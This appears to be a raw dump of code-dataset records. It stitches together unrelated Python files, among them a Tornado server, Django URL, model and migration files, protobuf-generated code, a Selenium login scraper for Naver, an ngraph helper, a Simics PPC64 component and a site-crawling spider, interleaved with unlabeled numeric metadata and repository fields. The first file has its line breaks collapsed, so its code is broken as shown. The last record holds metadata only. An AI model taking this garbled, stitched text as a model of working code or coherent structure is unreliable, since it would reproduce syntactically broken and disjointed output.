#!/usr/bin/env python # -*- coding: utf-8 -*- # -*- mode: python -*- import aiopg import psycopg2 import tornado.locks from tornado.options import define, options from tornado.web import Application from app.application import Application define('port', default=8080, help="listening port") define('bind_address', default="", help="bind address") define("db_host", default="127.0.0.1", help="database host") define("db_port", default=5432, help="database port") define("db_database", default="tornado", help="database name") define("db_user", default="tornado", help="database user") define("db_password", default="tornado", help="database password") async def maybe_create_tables(db): try: with (await db.cursor()) as cur: await cur.execute("SELECT COUNT(*) FROM schema LIMIT 1") await cur.fetchone() except psycopg2.ProgrammingError: print("Database error!") async def main(): options.parse_command_line() async with aiopg.create_pool( host=options.db_host, port=options.db_port, user=options.db_user, password=options.db_password, dbname=options.db_database) as db: await maybe_create_tables(db) app = Application(db) app.listen(options.port, options.bind_address, xheaders=True) print("Listening on http://%s:%i" % (options.bind_address, options.port)) shutdown_event = tornado.locks.Event() await shutdown_event.wait()
32.521739
81
0.675802
191
1,496
5.17801
0.382199
0.040445
0.054601
0.078868
0
0
0
0
0
0
0
0.014876
0.191176
1,496
45
82
33.244444
0.802479
0.042112
0
0
0
0
0.181119
0
0
0
0
0
0
1
0
false
0.058824
0.176471
0
0.176471
0.058824
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d99e63583440bf3da1b852644d47a0c0ec5d4a3
349
py
Python
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
from django.conf.urls import url, include from project.api.rankings.api import AddRanking, AddScore, GetScoresUser, GetScoresGame urlpatterns = [ url(r'add_ranking$', AddRanking.as_view()), url(r'add_score$', AddScore.as_view()), url(r'get_scores_game$', GetScoresGame.as_view()), url(r'get_scores_user$', GetScoresUser.as_view()) ]
38.777778
87
0.739255
48
349
5.166667
0.520833
0.064516
0.108871
0.120968
0.153226
0.153226
0
0
0
0
0
0
0.114613
349
9
88
38.777778
0.802589
0
0
0
0
0
0.154286
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d9a69d3f7389d018e9e0d4577b31c493762c8e2
4,895
py
Python
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: protobufs/services/feature/actions/get_flags.proto from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='protobufs/services/feature/actions/get_flags.proto', package='services.feature.actions.get_flags', syntax='proto3', serialized_pb=b'\n2protobufs/services/feature/actions/get_flags.proto\x12\"services.feature.actions.get_flags\"\x0b\n\tRequestV1\"\x84\x01\n\nResponseV1\x12H\n\x05\x66lags\x18\x01 \x03(\x0b\x32\x39.services.feature.actions.get_flags.ResponseV1.FlagsEntry\x1a,\n\nFlagsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x08:\x02\x38\x01\x62\x06proto3' ) _sym_db.RegisterFileDescriptor(DESCRIPTOR) _REQUESTV1 = _descriptor.Descriptor( name='RequestV1', full_name='services.feature.actions.get_flags.RequestV1', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=90, serialized_end=101, ) _RESPONSEV1_FLAGSENTRY = _descriptor.Descriptor( name='FlagsEntry', full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='key', full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry.key', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='value', full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry.value', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), b'8\001'), is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=192, serialized_end=236, ) _RESPONSEV1 = _descriptor.Descriptor( name='ResponseV1', full_name='services.feature.actions.get_flags.ResponseV1', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='flags', full_name='services.feature.actions.get_flags.ResponseV1.flags', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_RESPONSEV1_FLAGSENTRY, ], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=104, serialized_end=236, ) _RESPONSEV1_FLAGSENTRY.containing_type = _RESPONSEV1 _RESPONSEV1.fields_by_name['flags'].message_type = _RESPONSEV1_FLAGSENTRY DESCRIPTOR.message_types_by_name['RequestV1'] = _REQUESTV1 DESCRIPTOR.message_types_by_name['ResponseV1'] = _RESPONSEV1 RequestV1 = _reflection.GeneratedProtocolMessageType('RequestV1', (_message.Message,), dict( DESCRIPTOR = _REQUESTV1, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.RequestV1) )) _sym_db.RegisterMessage(RequestV1) ResponseV1 = _reflection.GeneratedProtocolMessageType('ResponseV1', (_message.Message,), dict( FlagsEntry = _reflection.GeneratedProtocolMessageType('FlagsEntry', (_message.Message,), dict( DESCRIPTOR = _RESPONSEV1_FLAGSENTRY, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.ResponseV1.FlagsEntry) )) , DESCRIPTOR = _RESPONSEV1, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.ResponseV1) )) _sym_db.RegisterMessage(ResponseV1) _sym_db.RegisterMessage(ResponseV1.FlagsEntry) _RESPONSEV1_FLAGSENTRY.has_options = True _RESPONSEV1_FLAGSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), b'8\001') # @@protoc_insertion_point(module_scope)
32.852349
371
0.765475
582
4,895
6.139175
0.218213
0.075567
0.110831
0.125945
0.600616
0.52281
0.490624
0.438567
0.376434
0.293591
0
0.034761
0.112564
4,895
148
372
33.074324
0.787753
0.091931
0
0.54918
1
0.008197
0.23259
0.201713
0
0
0
0
0
1
0
false
0
0.040984
0
0.040984
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5da0ff4d3e7dbb3fe7c21095720798fb7df7ef6b
742
py
Python
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
2
2017-09-24T02:29:48.000Z
2017-10-05T11:15:22.000Z
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
null
null
null
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
null
null
null
from selenium import webdriver username = "henlix" password = "my_password" browser = webdriver.PhantomJS() browser.implicitly_wait(5) url_login = "https://nid.naver.com/nidlogin.login" browser.get(url_login) el = browser.find_element_by_id("id") el.clear() el.send_keys(username) el = browser.find_element_by_id("pw") el.clear() el.send_keys(password) form = browser.find_element_by_css_selector("input.btn_global[type=submit]") form.submit() url_shopping_list = "https://order.pay.naver.com/home?tabMenu=SHOPPING" browser.get(url_shopping_list) products = browser.find_elements_by_css_selector(".p_info span") for product in products: print("- ", product.text) # PYTHONIOENCODING=utf-8:surrogateescape python3 selenium.02.py
22.484848
76
0.777628
109
742
5.055046
0.559633
0.079855
0.098004
0.108893
0.14882
0.087114
0
0
0
0
0
0.007396
0.088949
742
32
77
23.1875
0.807692
0.08221
0
0.1
0
0
0.21944
0.04271
0
0
0
0
0
1
0
false
0.1
0.05
0
0.05
0.05
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5da246d54547ba7b297b610234129f3853586daf
343
py
Python
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
from matplotlib import pyplot as plt drinks = ["cappuccino", "latte", "chai", "americano", "mocha", "espresso"] ounces_of_milk = [6, 9, 4, 0, 9, 0] error = [0.6, 0.9, 0.4, 0, 0.9, 0] #Yerr -> element at i position represents +/- error[i] variance on bar[i] value plt.bar( range(len(drinks)),ounces_of_milk, yerr=error, capsize=15) plt.show()
38.111111
79
0.667638
60
343
3.75
0.6
0.026667
0.04
0
0
0
0
0
0
0
0
0.061224
0.142857
343
9
80
38.111111
0.704082
0.227405
0
0
0
0
0.154717
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5da69a858193b1623616f277374a6ced50dc8b34
352
py
Python
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
1
2019-06-18T16:40:33.000Z
2019-06-18T16:40:33.000Z
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
null
null
null
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
1
2018-07-17T00:13:19.000Z
2018-07-17T00:13:19.000Z
# -*- coding: utf-8 -*- from django.db import models class KeyConstructorUserProperty(models.Model): name = models.CharField(max_length=100) class Meta: app_label = 'tests_app' class KeyConstructorUserModel(models.Model): property = models.ForeignKey(KeyConstructorUserProperty) class Meta: app_label = 'tests_app'
22
60
0.713068
38
352
6.473684
0.605263
0.089431
0.097561
0.138211
0.203252
0.203252
0
0
0
0
0
0.013986
0.1875
352
16
61
22
0.846154
0.059659
0
0.444444
0
0
0.054545
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5da7c35c6f555424a35c54ce0dd94e20ac56d5b8
4,116
py
Python
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
# ****************************************************************************** # Copyright 2018 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ****************************************************************************** from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import numpy as np import numbers from typing import Union class NumericLimits(object): """Class providing interface to extract numerical limits for given data type.""" @staticmethod def _get_number_limits_class(dtype): # type: (np.dtype) -> Union[IntegralLimits, FloatingPointLimits] """Return specialized class instance with limits set for given data type. :param dtype: The data type we want to check limits for. :return: The specialized class instance providing numeric limits. """ data_type = dtype.type value = data_type(1) if isinstance(value, numbers.Integral): return IntegralLimits(data_type) elif isinstance(value, numbers.Real): return FloatingPointLimits(data_type) else: raise ValueError('NumericLimits: unsupported data type: <{}>.'.format(dtype.type)) @staticmethod def _get_dtype(dtype): # type: (Union[np.dtype, int, float]) -> np.dtype """Return numpy dtype object wrapping provided data type. :param dtype: The data type to be wrapped. :return: The numpy dtype object. """ return dtype if isinstance(dtype, np.dtype) else np.dtype(dtype) @classmethod def max(cls, dtype): # type: (np.dtype) -> Union[int, float] """Return maximum value that can be represented in given data type. :param dtype: The data type we want to check maximum value for. :return: The maximum value. """ return cls._get_number_limits_class(cls._get_dtype(dtype)).max @classmethod def min(cls, dtype): # type: (np.dtype) -> Union[int, float] """Return minimum value that can be represented in given data type. :param dtype: The data type we want to check minimum value for. :return: The minimum value. """ return cls._get_number_limits_class(cls._get_dtype(dtype)).min class FloatingPointLimits(object): """Class providing access to numeric limits for floating point data types.""" def __init__(self, data_type): # type: (type) -> None self.data_type = data_type @property def max(self): # type: () -> float """Provide maximum representable value by stored data type. :return: The maximum value. """ return np.finfo(self.data_type).max @property def min(self): # type: () -> float """Provide minimum representable value by stored data type. :return: The minimum value. """ return np.finfo(self.data_type).min class IntegralLimits(object): """Class providing access to numeric limits for integral data types.""" def __init__(self, data_type): # type: (type) -> None self.data_type = data_type @property def max(self): # type: () -> int """Provide maximum representable value by stored data type. :return: The maximum value. """ return np.iinfo(self.data_type).max @property def min(self): # type: () -> int """Provide minimum representable value by stored data type. :return: The minimum value. """ return np.iinfo(self.data_type).min
34.588235
94
0.640671
508
4,116
5.074803
0.283465
0.086889
0.037238
0.027929
0.438712
0.418154
0.418154
0.389837
0.355702
0.297517
0
0.002854
0.233722
4,116
118
95
34.881356
0.814521
0.536929
0
0.355556
0
0
0.025935
0
0
0
0
0
0
1
0.222222
false
0
0.155556
0
0.644444
0.022222
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5da8c5b2385d6f73170c02cb6de27d3641c827fa
6,653
py
Python
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
1
2020-06-15T10:41:18.000Z
2020-06-15T10:41:18.000Z
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
null
null
null
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
3
2020-08-10T10:25:02.000Z
2021-09-12T01:12:09.000Z
## Copyright 2005-2007 Virtutech AB ## ## The contents herein are Source Code which are a subset of Licensed ## Software pursuant to the terms of the Virtutech Simics Software ## License Agreement (the "Agreement"), and are being distributed under ## the Agreement. You should have received a copy of the Agreement with ## this Licensed Software; if not, please contact Virtutech for a copy ## of the Agreement prior to using this Licensed Software. ## ## By using this Source Code, you agree to be bound by all of the terms ## of the Agreement, and use of this Source Code is subject to the terms ## the Agreement. ## ## This Source Code and any derivatives thereof are provided on an "as ## is" basis. Virtutech makes no warranties with respect to the Source ## Code or any derivatives thereof and disclaims all implied warranties, ## including, without limitation, warranties of merchantability and ## fitness for a particular purpose and non-infringement. from sim_core import * from components import * import time # Generic Simple System for PPC64 Processors class ppc64_simple_base_component(component_object): basename = 'system' connectors = { 'uart0' : {'type' : 'serial', 'direction' : 'down', 'empty_ok' : True, 'hotplug' : True, 'multi' : False}, 'uart1' : {'type' : 'serial', 'direction' : 'down', 'empty_ok' : True, 'hotplug' : True, 'multi' : False}} def __init__(self, parse_obj): component_object.__init__(self, parse_obj) self.o.cpu = [] self.map_offset = 0xf0000000 self.time_of_day = "2006-06-06 06:06:06 UTC" def get_cpu_frequency(self, idx): return self.freq_mhz def set_cpu_frequency(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value self.freq_mhz = val return Sim_Set_Ok def get_memory_megs(self, idx): return self.memory_megs def set_memory_megs(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value self.memory_megs = val return Sim_Set_Ok def get_map_offset(self, idx): return self.map_offset def set_map_offset(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value self.map_offset = val return Sim_Set_Ok def get_time_of_day(self, idx): return self.time_of_day def set_time_of_day(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value try: time.strptime(val, "%Y-%m-%d %H:%M:%S %Z") except Exception, msg: SIM_attribute_error(str(msg)) return Sim_Set_Illegal_Value self.time_of_day = val return Sim_Set_Ok def add_objects(self, cpu): self.o.phys_mem = pre_obj('phys_mem', 'memory-space') self.o.ram_image = pre_obj('memory_image', 'image') self.o.ram_image.size = self.memory_megs * 0x100000 self.o.ram = pre_obj('memory', 'ram') self.o.ram.image = self.o.ram_image self.o.pic = pre_obj('pic$', 'open-pic') self.o.pic.irq_devs = [cpu] self.o.irq = pre_obj('irq$', 'i8259x2') self.o.irq.irq_dev = self.o.pic self.o.uart0 = pre_obj('uart0', 'NS16550') self.o.uart0.irq_dev = self.o.irq self.o.uart0.irq_level = 4 self.o.uart0.xmit_time = 1000 self.o.uart1 = pre_obj('uart1', 'NS16550') self.o.uart1.irq_dev = self.o.irq self.o.uart1.irq_level = 3 self.o.uart1.xmit_time = 1000 self.o.of = pre_obj('of', 'ppc-of') self.o.of.cpu = self.o.cpu[0] self.o.of.memory_megs = self.memory_megs self.o.of.entry_point = 0x7000000 self.o.of.map_offset = self.map_offset self.o.of.time_of_day = self.time_of_day self.o.broadcast_bus = pre_obj('broadcast_bus', 'ppc-broadcast-bus') self.o.empty = pre_obj('empty', 'empty-device') self.o.pci_io = pre_obj('pci_io', 'memory-space') self.o.hfs = pre_obj('hfs$', 'hostfs') self.o.phys_mem.map = [ [0x00000000, self.o.ram, 0, 0x0, self.memory_megs * 0x100000], [self.map_offset + 0x08000000, self.o.pci_io, 0, 0x0, 0x100000], [self.map_offset + 0x0f660000, self.o.hfs, 0, 0, 0x10], [self.map_offset + 0x0fc00000, self.o.pic, 0, 0x0, 0x100000]] self.o.pci_io.map = [ [0x020, self.o.irq, 0, 0x20, 0x1], [0x021, self.o.irq, 0, 0x21, 0x1], [0x0a0, self.o.irq, 0, 0xa0, 0x1], [0x0a1, self.o.irq, 0, 0xa1, 0x1], # Linux probes for UARTs at 0x2e8 and 0x3e8 too, so provide # empty mappings there [0x2e8, self.o.empty, 0, 0x0, 0x8], # two NS16550, at the traditional addresses [0x2f8, self.o.uart1, 0, 0x0, 0x8, None, 0, 1], [0x3e8, self.o.empty, 0, 0x0, 0x8], [0x3f8, self.o.uart0, 0, 0x0, 0x8, None, 0, 1], # no UARTs here either [0x890, self.o.empty, 0, 0x0, 0x8], [0x898, self.o.empty, 0, 0x0, 0x8]] def add_connector_info(self): self.connector_info['uart0'] = [None, self.o.uart0, self.o.uart0.name] self.connector_info['uart1'] = [None, self.o.uart1, self.o.uart1.name] def connect_serial(self, connector, link, console): if connector == 'uart0': if link: self.o.uart0.link = link else: self.o.uart0.console = console elif connector == 'uart1': if link: self.o.uart1.link = link else: self.o.uart1.console = console def disconnect_serial(self, connector): if connector == 'uart0': self.o.uart0.link = None self.o.uart0.console = None elif connector == 'uart1': self.o.uart1.link = None self.o.uart1.console = None def get_clock(self): return self.o.cpu[0] def get_processors(self): return self.o.cpu ppc64_simple_attributes = [ ['cpu_frequency', Sim_Attr_Required, 'f', 'Processor frequency in MHz.'], ['memory_megs', Sim_Attr_Required, 'i', 'The amount of RAM in megabytes.'], ['map_offset', Sim_Attr_Optional, 'i', 'Base address for device mappings. ' \ 'Offsets at 4 GB and above will not work'], ['time_of_day', Sim_Attr_Optional, 's', 'Date and time to initialize the OpenFirmware RTC to']]
37.587571
78
0.599579
932
6,653
4.124464
0.262876
0.081946
0.028616
0.024714
0.21488
0.159729
0.114724
0.086889
0.086889
0.086889
0
0.058848
0.284834
6,653
176
79
37.801136
0.749054
0.167143
0
0.165354
0
0
0.105857
0
0
0
0.039651
0
0
0
null
null
0
0.023622
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5da9e73a716a3d83801c56b0312fd8f4d87f351c
385
py
Python
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
# Generated by Django 3.0.1 on 2020-02-15 06:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('course', '0001_initial'), ] operations = [ migrations.AddField( model_name='subject', name='Number_Of_Questions', field=models.IntegerField(default=0), ), ]
20.263158
49
0.597403
41
385
5.512195
0.804878
0
0
0
0
0
0
0
0
0
0
0.072993
0.288312
385
18
50
21.388889
0.751825
0.116883
0
0
1
0
0.130178
0
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5db0d4e1070be8121a1c33bca072f550967ebe82
6,969
py
Python
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
5
2015-05-11T18:13:51.000Z
2021-07-17T04:53:27.000Z
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
1
2015-03-06T20:32:14.000Z
2015-03-06T20:32:14.000Z
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
2
2015-07-15T12:41:32.000Z
2015-10-12T21:40:14.000Z
import urlparse import csv import sys import re import collections import time import requests from eek import robotparser # this project's version from bs4 import BeautifulSoup try: import lxml except ImportError: HTML_PARSER = None else: HTML_PARSER = 'lxml' encoding_re = re.compile("charset\s*=\s*(\S+?)(;|$)") html_re = re.compile("text/html") headers = ['url', 'title', 'description', 'keywords', 'allow', 'disallow', 'noindex', 'meta robots', 'canonical', 'referer', 'status'] def encoding_from_content_type(content_type): """ Extracts the charset from a Content-Type header. >>> encoding_from_content_type('text/html; charset=utf-8') 'utf-8' >>> encoding_from_content_type('text/html') >>> """ if not content_type: return None match = encoding_re.search(content_type) return match and match.group(1) or None class NotHtmlException(Exception): pass class UrlTask(tuple): """ We need to keep track of referers, but we don't want to add a url multiple times just because it was referenced on multiple pages """ def __hash__(self): return hash(self[0]) def __eq__(self, other): return self[0] == other[0] class VisitOnlyOnceClerk(object): def __init__(self): self.visited = set() self.to_visit = set() def enqueue(self, url, referer): if not url in self.visited: self.to_visit.add(UrlTask((url, referer))) def __bool__(self): return bool(self.to_visit) def __iter__(self): while self.to_visit: (url, referer) = self.to_visit.pop() self.visited.add(url) yield (url, referer) def lremove(string, prefix): """ Remove a prefix from a string, if it exists. >>> lremove('www.foo.com', 'www.') 'foo.com' >>> lremove('foo.com', 'www.') 'foo.com' """ if string.startswith(prefix): return string[len(prefix):] else: return string def beautify(response): content_type = response.headers.get('content-type') if content_type: if not html_re.search(content_type): raise NotHtmlException encoding = encoding_from_content_type(content_type) else: encoding = None try: return BeautifulSoup( response.content, features=HTML_PARSER, from_encoding=encoding, ) except UnicodeEncodeError: raise NotHtmlException def get_links(response): if 300 <= response.status_code < 400 and response.headers['location']: # redirect yield urlparse.urldefrag( urlparse.urljoin(response.url, response.headers['location'], False) )[0] try: html = beautify(response) for i in html.find_all('a', href=True): yield urlparse.urldefrag(urlparse.urljoin(response.url, i['href'], False))[0] except NotHtmlException: pass def force_unicode(s): if isinstance(s, str): return unicode(s, encoding='utf-8') else: return s def force_bytes(str_or_unicode): if isinstance(str_or_unicode, unicode): return str_or_unicode.encode('utf-8') else: return str_or_unicode def get_pages(base, clerk, session=requests.session()): clerk.enqueue(base, base) base_domain = lremove(urlparse.urlparse(base).netloc, 'www.') for (url, referer) in clerk: url = force_bytes(url) referer = force_bytes(referer) response = session.get( url, headers={'Referer': referer, 'User-Agent': 'Fusionbox spider'}, allow_redirects=False, ) for link in get_links(response): parsed = urlparse.urlparse(link) if lremove(parsed.netloc, 'www.') == base_domain: clerk.enqueue(link, url) yield referer, response def metadata_spider(base, output=sys.stdout, delay=0, insecure=False): writer = csv.writer(output) robots = robotparser.RobotFileParser(base + '/robots.txt') robots.read() writer.writerow(headers) session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), session=session): rules = applicable_robot_rules(robots, response.url) robots_meta = canonical = title = description = keywords = '' try: html = beautify(response) robots_meta = ','.join(i['content'] for i in html.find_all('meta', {"name": "robots"})) try: canonical = html.find_all('link', {"rel": "canonical"})[0]['href'] except IndexError: pass try: title = html.head.title.contents[0] except (AttributeError, IndexError): pass try: description = html.head.find_all('meta', {"name": "description"})[0]['content'] except (AttributeError, IndexError, KeyError): pass try: keywords = html.head.find_all('meta', {"name": "keywords"})[0]['content'] except (AttributeError, IndexError, KeyError): pass except NotHtmlException: pass writer.writerow(map(force_bytes, [ response.url, title, description, keywords, ','.join(rules['allow']), ','.join(rules['disallow']), ','.join(rules['noindex']), robots_meta, canonical, referer, response.status_code, ])) if delay: time.sleep(delay) def grep_spider(base, pattern, delay=0, insensitive=False, insecure=False): flags = 0 if insensitive: flags |= re.IGNORECASE pattern = re.compile(pattern, flags) session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), session=session): for line in response.content.split('\n'): if pattern.search(line): print u'%s:%s' % (force_unicode(response.url), force_unicode(line)) if delay: time.sleep(delay) def graphviz_spider(base, delay=0, insecure=False): print "digraph links {" session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), session=session): for link in get_links(response): print ' "%s" -> "%s";' % (force_bytes(response.url), force_bytes(link)) if delay: time.sleep(delay) print "}" def applicable_robot_rules(robots, url): rules = collections.defaultdict(list) if robots.default_entry: rules[robots.default_entry.allowance(url)].append('*') for entry in robots.entries: rules[entry.allowance(url)].extend(entry.useragents) return rules
29.529661
99
0.605252
791
6,969
5.208597
0.25158
0.034709
0.01335
0.02233
0.215534
0.203155
0.129126
0.081553
0.081553
0.081553
0
0.004951
0.275506
6,969
235
100
29.655319
0.811052
0.004448
0
0.251397
0
0
0.056938
0.003889
0
0
0
0
0
0
null
null
0.039106
0.061453
null
null
0.022346
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5db204f5af9206eceaf400a510a5e3d05316e861
2,647
py
Python
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
199
2017-07-24T01:34:27.000Z
2022-01-29T00:50:55.000Z
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
46
2017-09-05T19:27:20.000Z
2019-01-07T09:47:26.000Z
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
45
2017-07-26T00:10:44.000Z
2022-03-16T20:44:59.000Z
